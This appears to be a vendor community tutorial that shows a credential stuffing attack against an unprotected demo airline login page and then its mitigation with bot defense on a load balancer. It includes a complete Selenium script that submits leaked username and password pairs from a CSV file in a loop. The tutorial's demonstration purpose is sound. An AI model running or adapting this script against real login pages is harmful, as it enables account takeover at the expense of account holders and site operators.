12-Jul-2022 05:00 - edited 19-Apr-2023 03:40
In our daily activities confirmation of the user's identity, authentication, authorization and session management is critical to protect against authentication-related attacks. There may be authentication weaknesses if the application:
This is the common attack attackers typically use with lists of known passwords with automation tools like Selenium, Postman, etc. and get authenticated. Suppose an application does not implement automated threat or credential stuffing protection, attacker can exploit the login page using this credential stuffing attack.
Step1:
Please follow steps as per link to configure HTTP load balancer. Do not configure any security policies or bot-defense on this load balancer.
Step2:
Develop a selenium script to automate UI login page which uses credentials from creds.csv file as below:
from selenium import webdriver
import random
import string
import os
import csv
import sys
import argparse
import time
driver = webdriver.Chrome("chromedriver.exe")
parser = argparse.ArgumentParser()
parser.add_argument("--backend", help="Use the unprotected backend airline app", action="store_true")
args = parser.parse_args()
if args.backend:
target = 'https://jbair.f5-hyd-demo.com/user/signin'
else:
target = 'https://jbair.f5-hyd-demo.com/user/signin'
def loginuser(name, password):
driver.get(target)
driver.find_element_by_xpath('/html/body/div[2]/div/form/div[1]/input').send_keys(name)
driver.find_element_by_xpath('/html/body/div[2]/div/form/div[2]/input').send_keys(password)
driver.find_element_by_xpath('/html/body/div[2]/div/form/button').click()
f = open('creds.csv')
csv = csv.reader(f)
for row in csv:
print (row[0])
print (row[1])
if loginuser(row[0], row[1]) is True:
break
time.sleep(1)
driver.close()
Step3:
Execute the above script to generate credential stuffing attack and to identify if anyone of the provided credentials is working.
In above steps we have seen how hackers were able to find valid credentials from large combinations of leaked passwords using simple automation scripts.
Below are some of the best practices suggested to prevent this credential stuffing attack:
Mitigation using F5 distributed cloud:
As shown above, brute force attacks can be mitigated by configuring Bot-Defense on load balancer thereby preventing forceful browsing and credential stuffing.
For further information click the links below: